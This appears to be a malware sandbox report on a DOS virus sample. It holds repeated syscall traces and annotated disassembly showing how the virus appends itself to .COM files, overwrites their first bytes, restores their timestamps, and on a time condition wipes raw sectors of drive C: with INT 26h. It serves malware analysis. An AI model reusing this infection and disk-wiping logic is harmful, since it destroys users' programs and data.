Sample viewer

vx.netlux.org/Virus.DOS.Riot.Uniq.308


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:34.512657651Z 26 PC: 12a84 | Set disk transfer address
2018-12-17T22:50:34.515281582Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.525262995Z 61 PC: 12aca | Open file (Filename = 'c:\dos\doskey.com')
2018-12-17T22:50:34.532303221Z 78 PC: 12a93 | Find first file
2018-12-17T22:50:34.53983897Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.556548359Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:34.570976104Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.573303039Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.580761739Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.582479018Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.585388477Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.594556604Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.597666114Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.605163404Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.60816016Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.61629137Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.619280234Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.629647985Z 61 PC: 12aca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:34.63657181Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.638321606Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.64561238Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.647371732Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.64984951Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.653283916Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.654968388Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.657794617Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.663393519Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.671114204Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.67375302Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.682997673Z 61 PC: 12aca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:34.687451895Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.688490885Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.693037542Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.694822127Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.696523413Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.699100357Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.700302503Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.702116262Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.703417818Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.708252091Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.710112899Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.716773789Z 61 PC: 12aca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:34.72826993Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.72981907Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.736507118Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.738487323Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.741009621Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.744158809Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.746608021Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.750143651Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.751981369Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.760174401Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.762890958Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.77252415Z 61 PC: 12aca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:34.77976763Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.781402462Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.787500982Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.789118254Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.791698836Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.794588593Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.796591975Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.799454487Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.801142097Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.809035407Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.812475583Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.822028682Z 61 PC: 12aca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:34.828638323Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.831193608Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.83732109Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.838670612Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.841429336Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.849575289Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.851037485Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.858416669Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.860146337Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.868089783Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.871838599Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.881928478Z 61 PC: 12aca | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:34.888728626Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.891330156Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.897852812Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.899509609Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.902782061Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.905854977Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.907327726Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.91070906Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.912368853Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.91975667Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.923520312Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.933309828Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:34.940052126Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.943296474Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.949585615Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.95090108Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-17T22:50:34.954327842Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.963157043Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.964547917Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.972558722Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.974058196Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.981618677Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.984981558Z 44 PC: 12aa0 | Get time 0x12aa0: cmp dl, 2
; Viewer's disassembly window around PC 0x12aa0, where the last traced DOS
; "Get time" call (INT 21h AH=2Ch, DL = hundredths of a second) returned; the
; window's first instruction, `cmp dl, 2`, sits on the trace line just above.
; NOTE(review): the trace appears to list only INT 21h calls, so it does not
; show whether the INT 26h branch below ran in this execution.
0x12aa3: ja 0x12aae                       ; DL > 2 (unsigned): skip the disk write below
0x12aa5: mov al, 2                        ; INT 26h drive number: 0 = A:, so 2 = C:
0x12aa7: mov cx, 0x4d2                    ; sector count = 0x4d2 (1234)
0x12aaa: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX; presumably 0 (first sector), AH is not shown
0x12aab: int 0x26                         ; DOS absolute disk write: raw sectors, bypassing the file system; the destructive payload
0x12aad: popf                             ; INT 26h returns with the caller's flags still on the stack; drop them
0x12aae: mov dx, 0x80                     ; DS:0080h, the default DTA inside the PSP
0x12ab1: mov ah, 0x1a                     ; INT 21h AH=1Ah: set disk transfer address
0x12ab3: int 0x21                         ; traced as "Set disk transfer address" at PC 12ab5
0x12ab5: mov di, 0x100
0x12ab8: push di
0x12ab9: ret                              ; push 0x100 / ret = jump to offset 0x100, the .COM entry point (back to the host program)
; A separate routine starts here: it opens the file named at bp+0x252.
0x12aba: lea dx, word ptr [bp + 0x252]    ; DS:DX = file name
0x12abe: mov ax, 0x4301                   ; INT 21h AX=4301h: set file attributes
0x12ac1: xor cx, cx                       ; CX = 0: clear every attribute, read-only included
0x12ac3: int 0x21
0x12ac5: mov ax, 0x3d02                   ; INT 21h AH=3Dh AL=02h: open for read/write
0x12ac8: int 0x21
0x12aca: jb 0x12b22                       ; CF set = open failed: jump to 0x12b22, shown as `ret` in the other window on this page
2018-12-17T22:50:34.987135699Z 26 PC: 12ab5 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10271,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:37.02407189Z 26 PC: 12a84 | Set disk transfer address
2018-12-25T12:27:37.025678088Z 67 PC: 12ac5 | Get or set file attributes
2018-12-25T12:27:37.03742743Z 61 PC: 12aca | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:27:37.045484293Z 78 PC: 12a93 | Find first file
2018-12-25T12:27:37.052972465Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.071958278Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.078139006Z 87 PC: 12ad2 | Get or set file date and time
2018-12-25T12:27:37.079516996Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:37.086743429Z 66 PC: 12aee | Move file pointer
2018-12-25T12:27:37.088368713Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
; Viewer's disassembly window around PC 0x12af9, where the traced DOS "Get time"
; call (INT 21h AH=2Ch) returned; the window's first instruction, `add dl, dh`,
; sits on the trace line just above. This is the tail of the routine that
; modifies the .COM file opened earlier in the trace.
0x12afb: je 0x12af5                       ; ZF from `add dl, dh`: a zero sum goes back to 0x12af5 (not shown; presumably asks for the time again)
0x12afd: mov word ptr [bp + 0x10d], bx    ; store BX at bp+0x10d; what that slot holds is not visible here
0x12b01: call 0x22a4f                     ; NOTE(review): target lies past 64 KiB; presumably wraps to 0x12a4f in 16-bit code, which fits the 308-byte write traced next at PC 12a5d
0x12b04: mov ax, 0x4200                   ; INT 21h AH=42h AL=00h: move file pointer, origin = start of file
0x12b07: sub cx, cx                       ; CX = 0, high word of the offset
0x12b09: cdq                              ; opcode 99h is CWD in 16-bit code: DX = sign of AX = 0, low word of the offset
0x12b0a: int 0x21                         ; seek to offset 0
0x12b0c: mov ah, 0x40                     ; INT 21h AH=40h: write to the handle in BX
0x12b0e: mov cx, 4                        ; 4 bytes
0x12b11: lea dx, word ptr [bp + 0x22c]    ; from the buffer at bp+0x22c (contents not shown)
0x12b15: int 0x21                         ; overwrites the first 4 bytes of the file; traced as "Write 4 bytes"
0x12b17: pop dx                           ; DX and CX come off the stack; presumably the date and time
0x12b18: pop cx                           ;   saved after the earlier date/time call at PC 12ad2 (confirm)
0x12b19: mov ax, 0x5701                   ; INT 21h AX=5701h: set file date and time from CX/DX
0x12b1c: int 0x21                         ; if the originals are restored, the timestamp hides the change; compare size and content instead
0x12b1e: mov ah, 0x3e                     ; INT 21h AH=3Eh: close the handle in BX
0x12b20: int 0x21
0x12b22: ret                              ; end of the routine
0x12b23: pop bx                           ; first instruction of whatever follows; outside this routine
2018-12-25T12:27:37.090595671Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-25T12:27:37.09931124Z 66 PC: 12b0c | Move file pointer
2018-12-25T12:27:37.101348535Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:37.109846498Z 87 PC: 12b1e | Get or set file date and time
2018-12-25T12:27:37.113095714Z 62 PC: 12b22 | Close file
2018-12-25T12:27:37.122200693Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.12539385Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.137790593Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.145613595Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.147634591Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.156212045Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.158205871Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.161188918Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.164795852Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.167219094Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.170489391Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.173232408Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.182271723Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.185218973Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.19431494Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.201675723Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.203617826Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.211030845Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.214357701Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.217486483Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.221208079Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.224204425Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.228027668Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.230309191Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.239727507Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.244700675Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.256678084Z 61 PC: 12aca | Open file (See above)
